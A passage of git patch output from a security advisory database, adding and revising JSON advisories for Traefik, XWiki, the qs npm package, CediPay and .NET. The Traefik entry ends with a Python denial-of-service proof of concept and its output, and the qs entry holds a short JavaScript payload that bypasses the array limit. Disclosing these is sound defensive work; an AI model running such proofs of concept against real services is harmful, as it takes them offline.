TRAEFIK_BIN,\n \"--log.level=ERROR\",\n f\"--entryPoints.web.address=:{PORT}\",\n f\"--entryPoints.web.transport.respondingTimeouts.readTimeout={READ_TIMEOUT_SECS}s\",\n f\"--providers.file.filename={dyn}\",\n \"--providers.file.watch=false\",\n ],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.STDOUT,\n )\n try:\n time.sleep(STARTUP_SLEEP_SECS)\n\n pid = proc.pid\n if pid is None:\n raise RuntimeError(\"Traefik PID is None\")\n\n ver = subprocess.check_output([TRAEFIK_BIN, \"version\"], text=True).strip()\n print(ver)\n print(f\"Traefik={TRAEFIK_BIN}\")\n print(f\"Host={HOST} Port={PORT} ReadTimeout={READ_TIMEOUT_SECS}s N={N_CONNS} Sleep={SLEEP_SECS}s\")\n\n base = fd_count(pid)\n print(f\"traefik_pid={pid} fd_base={base}\")\n\n idle = open_idle_conns(N_CONNS)\n fd_after_open_idle = fd_count(pid)\n print(f\"baseline_opened={N_CONNS} fd_after_open={fd_after_open_idle} delta={fd_after_open_idle - base}\")\n time.sleep(SLEEP_SECS)\n fd_after_sleep_idle = fd_count(pid)\n print(f\"baseline_after_sleep fd={fd_after_sleep_idle} delta_from_base={fd_after_sleep_idle - base}\")\n close_all(idle)\n\n pg = open_postgres_sslrequest_conns(N_CONNS)\n fd_after_open_pg = fd_count(pid)\n print(f\"candidate_opened={N_CONNS} fd_after_open={fd_after_open_pg} delta={fd_after_open_pg - base}\")\n time.sleep(SLEEP_SECS)\n fd_after_sleep_pg = fd_count(pid)\n print(f\"candidate_after_sleep fd={fd_after_sleep_pg} delta_from_base={fd_after_sleep_pg - base}\")\n close_all(pg)\n\n if (fd_after_sleep_idle - base) <= 5 and (fd_after_sleep_pg - base) >= (N_CONNS // 2):\n print(\"VULNERABLE: Postgres SSLRequest keeps connections open past entrypoint readTimeout.\")\n else:\n print(\"INCONCLUSIVE: adjust N_CONNS upward or inspect Traefik logs.\")\n finally:\n proc.terminate()\n try:\n proc.wait(timeout=3.0)\n except subprocess.TimeoutExpired:\n proc.kill()\n proc.wait(timeout=3.0)\n\n\nif __name__ == \"__main__\":\n main()\n```\n
\n\n\n
\nExpected output (Click to expand)\n\n```bash\nVersion: 3.6.7\nCodename: ramequin\nGo version: go1.24.11\nBuilt: 2026-01-14T14:04:03Z\nOS/Arch: linux/amd64\nTraefik=/usr/local/sbin/traefik\nHost=127.0.0.1 Port=18080 ReadTimeout=2.0s N=300 Sleep=3.5s\ntraefik_pid=46204 fd_base=6\nbaseline_opened=300 fd_after_open=128 delta=122\nbaseline_after_sleep fd=6 delta_from_base=0\ncandidate_opened=300 fd_after_open=306 delta=300\ncandidate_after_sleep fd=306 delta_from_base=300\nVULNERABLE: Postgres SSLRequest keeps connections open past entrypoint readTimeout.\n```\n
\n\n### Impact\nDenial of service. Any internet-exposed entrypoint using the TCP switcher/protocol detection (including \"web\" HTTP entrypoints) with a `readTimeout` is affected; no Postgres configuration is required. At sufficient concurrency, Traefik can hit process limits (FD exhaustion/goroutine pressure/memory), taking the proxy offline.\n\n
", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/traefik/traefik/v3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.6.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.6.7" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w" + }, + { + "type": "PACKAGE", + "url": "https://github.com/traefik/traefik" + }, + { + "type": "WEB", + "url": "https://github.com/traefik/traefik/releases/tag/v3.6.8" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T15:54:11Z", + "nvd_published_at": null + } +} \ No newline at end of file From 07a961c7cbf279aa21f26fa22e61bb9e16a6a712 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 15:57:34 +0000 Subject: [PATCH 037/215] Publish GHSA-74rh-c5rh-88vg --- .../GHSA-74rh-c5rh-88vg.json | 115 ++++++++++++++++++ 1 file changed, 115 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json diff --git a/advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json b/advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json new file mode 100644 index 0000000000000..9e0bd5d594089 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json @@ -0,0 +1,115 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-74rh-c5rh-88vg", + "modified": "2026-02-12T15:54:20Z", + "published": "2026-02-12T15:54:19Z", + "aliases": [ + "CVE-2026-26000" + ], + "summary": "XWiki vulnerable to click-jacking through CSS injection in comments", + "details": "### Impact\n\nIt's possible using comments to inject CSS that would transform the full wiki in a link area leading to a malicious page. All versions of XWiki are impacted by this kind of attack. \n\n### Patches\n\nThe problem has been patched not by preventing injecting CSS in comments, which is currently a feature of XWiki, but by requiring confirmation from users when driving them to untrusted domains after clicking on a link, thus preventing any click-jacking attack. \nThis security measure has been put in place in XWiki 17.9.0, 17.4.6, 16.10.13.\n\n### Workarounds\n\nThere's no out-of-the-box workaround, but it should be possible to partly reuse [the javascript code provided for the security measure](https://github.com/xwiki/xwiki-platform/blob/xwiki-platform-17.9.0/xwiki-platform-core/xwiki-platform-web/xwiki-platform-web-war/src/main/webapp/resources/uicomponents/link/link-protection.js) in a JSX object inside the wiki, to request the same kind of confirmation. \n\n### References\n * JIRA ticket: https://jira.xwiki.org/browse/XWIKI-23433\n * Documentation of the new security measure: https://www.xwiki.org/xwiki/bin/view/ReleaseNotes/Data/XWiki/17.9.0RC1/Entry006/\n * Commit for the security fix: https://github.com/xwiki/xwiki-platform/commit/29cb81f3a5387cf822d7e7534bdd63903275f86b\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n\n### Attribution\n\nThanks Tomas Keech (Sentrium Security Ltd) for reporting this vulnerability.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.xwiki.platform:xwiki-platform-web" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "17.5.0" + }, + { + "fixed": "17.9.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.xwiki.platform:xwiki-platform-web" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "17.0.0-rc-1" + }, + { + "fixed": "17.4.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.xwiki.platform:xwiki-platform-web" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "16.10.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-74rh-c5rh-88vg" + }, + { + "type": "WEB", + "url": "https://github.com/xwiki/xwiki-platform/pull/4645" + }, + { + "type": "WEB", + "url": "https://github.com/xwiki/xwiki-platform/commit/29cb81f3a5387cf822d7e7534bdd63903275f86b" + }, + { + "type": "WEB", + "url": "https://github.com/xwiki/xwiki-platform/commit/7b5a4f8c34d9b1da3d966e17f7dbccabac448e75" + }, + { + "type": "PACKAGE", + "url": "https://github.com/xwiki/xwiki-platform" + }, + { + "type": "WEB", + "url": "https://jira.xwiki.org/browse/XWIKI-23433" + }, + { + "type": "WEB", + "url": "https://www.xwiki.org/xwiki/bin/view/ReleaseNotes/Data/XWiki/17.9.0RC1/Entry006" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1021" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T15:54:19Z", + "nvd_published_at": null + } +} \ No newline at end of file From c2e97091de6ca2233d1c06d077507857a1ecf0dd Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 17:06:12 +0000 Subject: [PATCH 038/215] Publish Advisories GHSA-w7fw-mjwx-w883 GHSA-wvr6-395c-5pxr --- .../GHSA-w7fw-mjwx-w883.json | 68 +++++++++++++++++++ .../GHSA-wvr6-395c-5pxr.json | 57 ++++++++++++++++ 2 files changed, 125 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-wvr6-395c-5pxr/GHSA-wvr6-395c-5pxr.json diff --git a/advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json b/advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json new file mode 100644 index 0000000000000..cb54163c293f7 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7fw-mjwx-w883", + "modified": "2026-02-12T17:04:39Z", + "published": "2026-02-12T17:04:39Z", + "aliases": [ + "CVE-2026-2391" + ], + "summary": "qs's arrayLimit bypass in comma parsing allows denial of service", + "details": "### Summary\nThe `arrayLimit` option in qs does not enforce limits for comma-separated values when `comma: true` is enabled, allowing attackers to cause denial-of-service via memory exhaustion. This is a bypass of the array limit enforcement, similar to the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p (CVE-2025-15284).\n\n### Details\nWhen the `comma` option is set to `true` (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., `?param=a,b,c` becomes `['a', 'b', 'c']`). However, the limit check for `arrayLimit` (default: 20) and the optional throwOnLimitExceeded occur after the comma-handling logic in `parseArrayValue`, enabling a bypass. This permits creation of arbitrarily large arrays from a single parameter, leading to excessive memory allocation.\n\n**Vulnerable code** (lib/parse.js: lines ~40-50):\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n return val.split(',');\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\nThe `split(',')` returns the array immediately, skipping the subsequent limit check. Downstream merging via `utils.combine` does not prevent allocation, even if it marks overflows for sparse arrays.This discrepancy allows attackers to send a single parameter with millions of commas (e.g., `?param=,,,,,,,,...`), allocating massive arrays in memory without triggering limits. It bypasses the intent of `arrayLimit`, which is enforced correctly for indexed (`a[0]=`) and bracket (`a[]=`) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p).\n\n### PoC\n**Test 1 - Basic bypass:**\n```\nnpm install qs\n```\n\n```js\nconst qs = require('qs');\n\nconst payload = 'a=' + ','.repeat(25); // 26 elements after split (bypasses arrayLimit: 5)\nconst options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true };\n\ntry {\n const result = qs.parse(payload, options);\n console.log(result.a.length); // Outputs: 26 (bypass successful)\n} catch (e) {\n console.log('Limit enforced:', e.message); // Not thrown\n}\n```\n**Configuration:**\n- `comma: true`\n- `arrayLimit: 5`\n- `throwOnLimitExceeded: true`\n\nExpected: Throws \"Array limit exceeded\" error.\nActual: Parses successfully, creating an array of length 26.\n\n\n### Impact\nDenial of Service (DoS) via memory exhaustion.\n\n### Suggested Fix\nMove the `arrayLimit` check before the comma split in `parseArrayValue`, and enforce it on the resulting array length. Use `currentArrayLength` (already calculated upstream) for consistency with bracket notation fixes.\n\n**Current code** (lib/parse.js: lines ~40-50):\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n return val.split(',');\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\n\n**Fixed code:**\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n const splitArray = val.split(',');\n if (splitArray.length > options.arrayLimit - currentArrayLength) { // Check against remaining limit\n if (options.throwOnLimitExceeded) {\n throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n } else {\n // Optionally convert to object or truncate, per README\n return splitArray.slice(0, options.arrayLimit - currentArrayLength);\n }\n }\n return splitArray;\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\nThis aligns behavior with indexed and bracket notations, reuses `currentArrayLength`, and respects `throwOnLimitExceeded`. Update README to note the consistent enforcement.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "qs" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.14.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.14.1" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2391" + }, + { + "type": "WEB", + "url": "https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ljharb/qs" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T17:04:39Z", + "nvd_published_at": "2026-02-12T05:17:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-wvr6-395c-5pxr/GHSA-wvr6-395c-5pxr.json b/advisories/github-reviewed/2026/02/GHSA-wvr6-395c-5pxr/GHSA-wvr6-395c-5pxr.json new file mode 100644 index 0000000000000..6666e34904166 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-wvr6-395c-5pxr/GHSA-wvr6-395c-5pxr.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvr6-395c-5pxr", + "modified": "2026-02-12T17:04:50Z", + "published": "2026-02-12T17:04:50Z", + "aliases": [ + "CVE-2026-26063" + ], + "summary": "CediPay Affected by Improper Input Validation in Payment Processing", + "details": "A vulnerability in CediPay allows attackers to bypass input validation in the transaction API.\n\nAffected users: All deployments running versions prior to the patched release.\n\nRisk: Exploitation could result in unauthorized transactions, exposure of sensitive financial data, and compromise of payment integrity.\n\nSeverity: High — potential financial loss and reputational damage.\n\nPatches\nThe issue has been fixed in version 1.2.3.\n\nUsers should upgrade to 1.2.3 or later immediately.\n\nAll versions earlier than 1.2.3 remain vulnerable.\n\nWorkarounds\nIf upgrading is not immediately possible:\n\nRestrict API access to trusted networks or IP ranges.\n\nEnforce strict input validation at the application layer.\n\nMonitor transaction logs for anomalies or suspicious activity.\n\nThese mitigations reduce exposure but do not fully eliminate the vulnerability.\n\nReferences\nOWASP Input Validation Guidelines (owasp.org in Bing)\n\nCWE-20: Improper Input Validation\n\nGitHub Security Advisory Documentation (docs.github.com in Bing)", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "cedipay-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.2.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/xpertforextradeinc/CediPay/security/advisories/GHSA-wvr6-395c-5pxr" + }, + { + "type": "PACKAGE", + "url": "https://github.com/xpertforextradeinc/CediPay" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T17:04:50Z", + "nvd_published_at": null + } +} \ No newline at end of file From 04cbb3f86105ff2cdab772d99f2ab60f0ab861d0 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 17:39:15 +0000 Subject: [PATCH 039/215] Publish GHSA-qvhc-9v3j-5rfw --- .../02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json index 50f288c83c390..f6e20f5e308ee 100644 --- a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json +++ b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-qvhc-9v3j-5rfw", - "modified": "2026-02-10T21:32:18Z", + "modified": "2026-02-12T17:37:54Z", "published": "2026-02-10T21:32:18Z", "aliases": [ "CVE-2026-21218" ], "summary": "Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability", - "details": "# Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0, .NET 9.0, and .NET 10.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn attacker could exploit this vulnerability by crafting a malicious payload that bypasses the security checks in the affected System.Security.Cryptography.Cose versions, potentially leading to unauthorized access or data manipulation.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/380\n\n## Mitigation factors\n\nIf your application does not use System.Security.Cryptography.Cose it is not affected. By default, no .NET applications reference this component.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET project if it uses any of affected packages versions listed below\n\n### .NET 10\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 10.0.0, < 10.0.2 | 10.0.3\n\n### .NET 9\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 9.0.0, < 9.0.12 | 9.0.13\n\n### .NET 8\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 8.0.0, < 8.0.23 | 8.0.24\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\nTo update the Using the System.Security.Cryptography.Cose NuGet package, use one of the following methods:\n\nNuGet Package Manager UI in Visual Studio:\n- Open your project in Visual Studio.\n- Right-click on your project in Solution Explorer and select \"Manage NuGet Packages...\" or navigate to \"Project > Manage NuGet Packages\".\n- In the NuGet Package Manager window, select the \"Updates\" tab. This tab lists packages with available updates from your configured package sources.\n- Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.\n- Click the \"Update\" button.\n\nUsing the NuGet Package Manager Console in Visual Studio:\n- Open your project in Visual Studio.\n- Navigate to \"Tools > NuGet Package Manager > Package Manager Console\".\n- To update a specific package to its latest version, use the following Update-Package command:\n\n```Update-Package -Id System.Security.Cryptography.Cose```\n\nUsing the .NET CLI (Command Line Interface):\n- Open a terminal or command prompt in your project's directory.\n- To update a specific package to its latest version, use the following add package command:\n\n```dotnet add package System.Security.Cryptography.Cose```\n\nOnce you have updated the nuget package reference you must recompile and deploy your application. Additionally we recommend you update your runtime and/or SDKs, but it is not necessary to patch the vulnerability.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in a supported version of .NET, please report it to the Microsoft Security Response Center (MSRC) via the [MSRC Researcher Portal](https://msrc.microsoft.com/report/vulnerability/new). Further information can be found in the MSRC [Report an Issue FAQ](https://www.microsoft.com/msrc/faqs-report-an-issue).\n\nSecurity reports made through MSRC may qualify for the Microsoft .NET Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2026-21218](https://www.cve.org/CVERecord?id=CVE-2026-21218)\n\n### Acknowledgements\n\nvcsjones with GitHub\n\n### Revisions\n\nV1.0 (February 10, 2026): Advisory published.", + "details": "# Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0, .NET 9.0, and .NET 10.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn attacker could exploit this vulnerability by crafting a malicious payload that bypasses the security checks in the affected System.Security.Cryptography.Cose versions, potentially leading to unauthorized access or data manipulation.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/380\n\n## Mitigation factors\n\nIf your application does not use System.Security.Cryptography.Cose it is not affected. By default, no .NET applications reference this component.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET project if it uses any of affected packages versions listed below\n\n### .NET 10\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 10.0.0, < 10.0.2 | 10.0.3\n\n### .NET 9\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 9.0.0, < 9.0.12 | 9.0.13\n\n### .NET 8\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 8.0.0, < 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\nTo update the Using the System.Security.Cryptography.Cose NuGet package, use one of the following methods:\n\nNuGet Package Manager UI in Visual Studio:\n- Open your project in Visual Studio.\n- Right-click on your project in Solution Explorer and select \"Manage NuGet Packages...\" or navigate to \"Project > Manage NuGet Packages\".\n- In the NuGet Package Manager window, select the \"Updates\" tab. This tab lists packages with available updates from your configured package sources.\n- Select the package(s) you wish to update. You can choose a specific version from the dropdown or update to the latest available version.\n- Click the \"Update\" button.\n\nUsing the NuGet Package Manager Console in Visual Studio:\n- Open your project in Visual Studio.\n- Navigate to \"Tools > NuGet Package Manager > Package Manager Console\".\n- To update a specific package to its latest version, use the following Update-Package command:\n\n```\nUpdate-Package -Id System.Security.Cryptography.Cose\n```\n\nUsing the .NET CLI (Command Line Interface):\n- Open a terminal or command prompt in your project's directory.\n- To update a specific package to its latest version, use the following add package command:\n\n```\ndotnet add package System.Security.Cryptography.Cose\n```\n\nOnce you have updated the nuget package reference you must recompile and deploy your application. Additionally we recommend you update your runtime and/or SDKs, but it is not necessary to patch the vulnerability.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in a supported version of .NET, please report it to the Microsoft Security Response Center (MSRC) via the [MSRC Researcher Portal](https://msrc.microsoft.com/report/vulnerability/new). Further information can be found in the MSRC [Report an Issue FAQ](https://www.microsoft.com/msrc/faqs-report-an-issue).\n\nSecurity reports made through MSRC may qualify for the Microsoft .NET Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2026-21218](https://www.cve.org/CVERecord?id=CVE-2026-21218)\n\n### Acknowledgements\n\nvcsjones with GitHub\n\n### Revisions\n\nV1.0 (February 10, 2026): Advisory published.", "severity": [ { "type": "CVSS_V3", @@ -32,13 +32,13 @@ "introduced": "8.0.0" }, { - "fixed": "8.0.24" + "fixed": "8.0.2" } ] } ], "database_specific": { - "last_known_affected_version_range": "<= 8.0.23" + "last_known_affected_version_range": "<= 8.0.1" } }, { @@ -60,7 +60,7 @@ } ], "database_specific": { - "last_known_affected_version_range": "<= 9.0.12" + "last_known_affected_version_range": "< 9.0.12" } }, { @@ -82,7 +82,7 @@ } ], "database_specific": { - "last_known_affected_version_range": "<= 10.0.2" + "last_known_affected_version_range": "< 10.0.2" } } ], From b9f835e6d9bbf68f1e95576cba5819e3ffc19305 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 17:46:00 +0000 Subject: [PATCH 040/215] Publish GHSA-qvhc-9v3j-5rfw --- .../2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json index f6e20f5e308ee..bbc291a2be5e0 100644 --- a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json +++ b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qvhc-9v3j-5rfw", - "modified": "2026-02-12T17:37:54Z", + "modified": "2026-02-12T17:44:46Z", "published": "2026-02-10T21:32:18Z", "aliases": [ "CVE-2026-21218" @@ -15,7 +15,7 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" } ], "affected": [ @@ -108,7 +108,7 @@ "cwe_ids": [ "CWE-166" ], - "severity": "LOW", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-10T21:32:18Z", "nvd_published_at": "2026-02-10T18:16:22Z" From 51b6b939b21d8e79aa0b96c801a1be736836829d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 18:30:17 +0000 Subject: [PATCH 041/215] Publish GHSA-436v-jg82-p533 --- .../GHSA-436v-jg82-p533.json | 33 ++++++++++++++++--- 1 file changed, 29 insertions(+), 4 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json (52%) diff --git a/advisories/unreviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json b/advisories/github-reviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json similarity index 52% rename from 